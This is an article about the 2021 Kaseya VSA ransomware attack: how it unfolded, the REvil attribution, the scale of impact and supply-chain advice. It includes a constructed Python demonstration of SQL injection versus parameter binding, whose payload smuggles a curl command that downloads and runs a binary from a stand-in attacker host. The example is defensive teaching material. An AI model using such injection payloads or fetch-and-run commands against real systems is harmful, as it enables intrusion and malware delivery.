Kaseya, a Miami-based IT solutions developer for MSPs and enterprises, recently announced that it had become the victim of a cyberattack on July 2, 2021. According to Bloomberg, executives at Kaseya’s Miami office had been warned about critical security flaws in its software before the ransomware attack. The report also states that from 2017 to 2020, employees in Kaseya’s U.S. offices flagged wide-ranging cybersecurity concerns to company leadership, but those issues were not fully addressed.
The cyberattack has affected as many as 60 MSPs and more than 1,500 businesses. The attackers carried out a supply chain ransomware attack by exploiting a vulnerability in Kaseya’s VSA software against multiple MSPs and their customers. The attack has been attributed to the REvil ransomware group, which claims to have encrypted over one million end-customer systems.
On July 2, 2021 at 2:00 PM EST, Kaseya CEO Fred Voccola announced a potential attack against VSA, which he said had been limited to a small number of on-premises customers. As a precautionary measure, he also urged customers to shut down their on-premises VSA servers immediately. As Kaseya’s incident response team investigated further, the vendor also shut down its SaaS servers and took its data centers offline.
The FBI described it as a supply chain ransomware attack leveraging a vulnerability in Kaseya’s VSA software. Reports indicate that the attack began with an authentication bypass vulnerability in the VSA web interface. This let the attackers circumvent authentication controls and obtain an authenticated session, upload a malicious payload, and then run commands via SQL injection, achieving code execution on the VSA server. Because VSA is a remote monitoring and management tool that pushes agents and scripts to the endpoints it manages, code execution on a VSA server gives an attacker the same reach as the MSP itself, which is how compromising one server turned into ransomware on downstream customers’ systems.
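The step in that chain where SQL injection turns into command execution, shown as an added illustration in Python. This is example code written for this article, not Kaseya’s code, and it says nothing about how VSA itself is built; the `tasks` table, the task names and the injection payload are all constructed. The vulnerable lookup concatenates a caller-supplied task id into SQL, so an injected `UNION` lets the caller decide which command string the server goes on to execute; the hardened lookup binds the same input as a parameter, where it can only ever match an id.

```python
import sqlite3

# Constructed sample schema and data for this example; not a real product's tables.
SCHEMA = """
CREATE TABLE tasks (id TEXT PRIMARY KEY, command TEXT NOT NULL);
INSERT INTO tasks VALUES ('disk-check', 'df -h');
INSERT INTO tasks VALUES ('uptime', 'uptime');
"""

# Constructed attacker input: the leading quote closes the id literal, the UNION
# appends a row the attacker controls, and the trailing comment eats the rest.
PAYLOAD = "x' UNION SELECT 'curl http://attacker.example/agent.exe -o agent.exe && agent.exe' --"


def fresh_db():
    """In-memory SQLite database loaded with the sample tasks."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def resolve_command_vulnerable(conn, task_id):
    """Vulnerable: task_id is spliced into the query text.

    With PAYLOAD the query becomes
      SELECT command FROM tasks WHERE id = 'x' UNION SELECT '...' --'
    and the first row returned is the attacker's string, not a stored task.
    """
    row = conn.execute(
        f"SELECT command FROM tasks WHERE id = '{task_id}'"
    ).fetchone()
    return row[0] if row else None


def resolve_command_fixed(conn, task_id):
    """Hardened: the input is bound as a parameter, so it is compared as data.

    PAYLOAD is now just an id that matches nothing, and the lookup returns None.
    """
    row = conn.execute(
        "SELECT command FROM tasks WHERE id = ?", (task_id,)
    ).fetchone()
    return row[0] if row else None


def dispatch(conn, task_id, resolver):
    """Server-side dispatcher stand-in: reports the command it would execute.

    A real dispatcher would hand the string to a process runner, which is the
    point at which an injected row becomes code execution on the server.
    """
    command = resolver(conn, task_id)
    if command is None:
        return "rejected: unknown task"
    return f"would run: {command}"


if __name__ == "__main__":
    db = fresh_db()
    print(dispatch(db, "disk-check", resolve_command_vulnerable))
    print(dispatch(db, PAYLOAD, resolve_command_vulnerable))  # attacker's command
    print(dispatch(db, PAYLOAD, resolve_command_fixed))       # rejected
```

The fix is the parameter binding alone; no input filtering is involved. Whatever the injected string contains, the hardened query can only ever return a command that was already stored in the table.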
According to reports, 800 Coop supermarket stores in Sweden had to close because their cash registers could not be opened. Huntress said in a Reddit explainer that 1,000 companies had servers and workstations encrypted, and added that thousands of small businesses may have been impacted.
Sophos VP Ross McKerchar commented that this is one of the farthest-reaching criminal ransomware attacks that Sophos has ever seen.
On July 5, Kaseya gave revised estimates, saying that fewer than 60 direct customers and 1,500 downstream businesses were impacted. On July 6, the estimate was revised again, down to 50 direct customers and between 800 and 1,500 downstream businesses. Kaseya also said that none of its SaaS customers were compromised.
To limit your exposure through a supply chain, be ready to sever network connections to a vendor’s systems as soon as you learn that vendor has been compromised; in this case that meant taking on-premises VSA servers offline the moment Kaseya issued its warning, before waiting for details of the flaw. This can happen to the best of us. Staying alert and prepared is what limits the damage when it does.